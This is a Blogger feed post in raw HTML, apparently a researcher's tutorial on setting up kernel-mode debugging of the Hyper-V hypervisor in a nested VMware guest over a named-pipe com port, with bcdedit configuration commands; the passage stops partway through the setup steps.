tag:blogger.com,1999:blog-43212485837792913152024-02-19T07:29:01.942-08:00Hyper-V InternalsGerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-4321248583779291315.post-22177531088697436202021-01-11T05:43:00.007-08:002021-01-14T06:29:08.713-08:00 Hyper-V debugging for beginners. 2nd edition.<span id="docs-internal-guid-dca93936-7fff-eca8-9463-dd972f0b5dc5"><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><br /></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First version of article was published 7 years ago on Russian language and 5 years ago on English (with some modifications). Hyper-V is tremendously expanded since. Some time ago, I spend during Hyper-V memory investigation, now I am trying to see, what change in the world since 1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">st</span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> version of article was published, and what tools other researchers are using now.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Early Hyper-V was available only for Windows Server or Hyper-V Server (limited version of Windows Server) operations system family. But now many Windows components, including desktop, are based on Hyper-V. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b id="docs-internal-guid-105bd508-7fff-bb5f-679e-7f11aea9730b" style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 282px; overflow: hidden; width: 331px;"><img height="282" src="https://lh6.googleusercontent.com/SxV3GgKu2cqU_jb-d8G0LB6h-xeN8jcL2LUFDxlERcXg44yuXH4PUD_t8z59qJAXD93Q2jddQp7EFd5OZ6bSG78eRi1NTxXeUtJEmNFuiXsbDQs0IjNo41LenFiZ_cWvsCjxjjaTQbZv5y4AYg" style="margin-left: 0px; margin-top: 0px;" width="331" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Therefore, I decided to write actual version of that article. Some of techniques are outdated, many new tools were developed since, and it is interesting, how we can debug Hyper-V using this tools. Article will be described Hyper-V kernel mode debugging.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When 1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">st</span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> edition of article was written, only VMware Workstation supported nested virtualization. Now nested virtualization is default standard of emulation software, and it is supported by VMware, Hyper-V (Intel only, AMD still beta and available from Windows 10, build 19636 - </span><a href="https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://techcommunity.microsoft.com/t5/virtualization/amd-nested-virtualization-support/ba-p/1434841</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), VirtualBox, Qemu.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VirtualBox 6.1.16 doesn’t support SLAT on Intel CPU, therefore can’t be Hyper-V debugging environment now.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 94px; overflow: hidden; width: 321px;"><img height="94" src="https://lh4.googleusercontent.com/Ay4ZrPulvuhszEEOg0AAH2wGjT98c1W1YmsFM3uN_aPmYukEv0r4WgSGXOYAsQmtvn_M29FhXuHNO9QcQ7hyKTgWvj0De8g72Zq_DSFsFxRpY5CoKw6VE7X4y0bO0gtWhTwwnqaOiCsY-bcYxw" style="margin-left: 0px; margin-top: 0px;" width="321" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Microsoft is developing Hyper-V for Linux host. Only some patches were published for Linux - </span><a href="https://lwn.net/Articles/838146/" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://lwn.net/Articles/838146/</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It will be interesting to see it in working environment in future.</span></p><h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 12pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions</span></h1><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">The hypervisor (hypervisor module)–</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> component of Hyper-V, depending on the manufacturer of the processor (hvix64.exe for Intel and hvax64.exe for AMD, hvaa64.exe for ARM). The article discusses Hyper-V for Intel family processor.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall – </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call a given function in the hypervisor using the instructions vmcall\vmmcall\hvc.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root-partition – </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2019\Windows 10 with enabled Hyper-V partition.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMCS (virtual-machine control structure) – </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">structure, that defines logic of the hypervisor.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX root – </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mode, in which hypervisor is running.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 0.05pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX non-root – </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mode, in which the running operating system and its client application software.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 0.05pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VM exit – </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">transition of the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX non-root </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">into </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX root. </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Occurs when the execution of instructions or conditions specified in the VMCS incorporated directly into the logic of the processor.</span></p><h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 12pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging</span></h1><h2 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 2pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Com-port debugging</span></h2><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V consists of several components; a brief description can be found in </span><a href="https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/hyper-v-architecture" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/reference/hyper-v-architecture</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. For debugging Hyper-V components you can use WinDBG or other usermode or kernelmode debugger, however, to connect to the hypervisor you have to perform a few extra steps to configure root-partition.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For debugging hypervisor, Microsoft developed a special extension to WinDBG hvexts.dll, which, unfortunately, is not included in the distribution debugger and is available only to partners (because that extension needs private symbols for hypervisor module, which is not present). Also, in the catalog </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winxp</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, located in WinDBG folder, is an extension of nvkd.dll, which is intended for debugging extensions virtual switch Hyper-V.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG help file contains description of debugging hypervisor via cable through the com-port (search - Debugging Hyper-V via a Null-modem Cable Connection in debugger.chm), implying the presence of two physical machines. However, the hypervisor can be debugged, if you run it in any supported virtualization software. Next, we see VMware Workstation. Install Windows Server 2019 as guest OS, enable Hyper-V component.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you directly connect to VMware com-port, you get some errors during communication. Use some free com-port utility for connection stabilization (I used com-port emulator Free Virtual Serial Ports utility from the HHD-software (</span><a href="https://freevirtualserialports.com" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://freevirtualserialports.com</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) – version 3.32. Version 4.12 give errors, when </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is tried to open COM-port)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Actions:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Create com-port for VMware virtual machine (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hardware</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Add</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Serial port</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Use named pipe</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Enter \\.\pipe\com_1</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 206px; overflow: hidden; width: 495px;"><img height="206" src="https://lh5.googleusercontent.com/63E7FRD2_mOMO6JX7YXlTkto0S71t_9a7kpUs_IbaQ1QrBOpYZ4z-I-rHOY6hcqXtDlJIIkK4J8jGEjApMVAVB6e7RuNotebrRac0tAh2J-Taw9Qrw5cnRq0SI26SLDZ0nbHohTHlbKKMXW1LA" style="margin-left: 0px; margin-top: 0px;" width="495" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To perform root-partition commands to configure debugging hypervisor and the OS:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hypervisor debugging options</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings serial DEBUGPORT:1 BAUDRATE:115200</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">root OS debugging mode (using same com-port)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set dbgtransport kdhvcom.dll </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings serial DEBUGPORT:1 BAUDRATE:115200</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /debug on</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Additionally</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 